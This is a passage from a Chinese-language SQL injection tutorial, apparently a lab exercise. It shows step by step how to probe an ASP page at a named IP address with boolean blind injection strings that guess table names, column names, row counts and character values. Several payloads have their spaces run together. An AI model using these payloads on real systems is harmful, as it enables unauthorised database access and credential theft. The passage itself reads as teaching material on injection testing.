3、用字符型判断语句“' and '1'='1”和“'and '1'='2”测试。会发现“' and '1'='1”返回正确而“' and '1'='2”返回错误肯定存在注入漏洞。第三部验证漏洞后通过SQL入侵得到用户名和密码此处我们破解的流程如下:判断数据库表名—> 判断数据库列名—>判断列名字段个数—>字段猜解下面沾出实验的五个语句,然后慢慢带着大家破解测试数据库中字段长度http://202.114.145.8/index.asp?city=bj'and(selecttop1len(tel)frominfo)>10and'1'='1猜测数据库中表' and exists (select
4、* from admin) and '1'='1猜测数据库中字段子列' and exists (select admin from info) and '1'='1利用二分法猜测数据库中的信息条数' and (select Count(1) from [info] where 1=1) between 0 and 100 and '1'='1猜测数据库中值得代码http://202.114.145.8/index.asp?city=bj'and(selecttop1asc(mid(city,1,1))frominfo)>97and'1'='1第四部分开始破解1破解表名在地址栏后加上' an
5、d exists (select * from 表名) and '1'='1当常用表名输入info时系统返回正常图面如下我们再随意输入一个表名“' and exists (select * from admin) and '1'='1”发现返回错误并且错误写着找不到输入表admin,这就说明不存在admin表但是存在info表。2.破解列名首先经过对表名的破解大家已经有了基础,还是破解列名的方法也是一样的如下猜测列名语句猜测数据库中字段子列' and exists (select 列名 from info) and '1'='1将列名换成username反馈正常判断有username接下来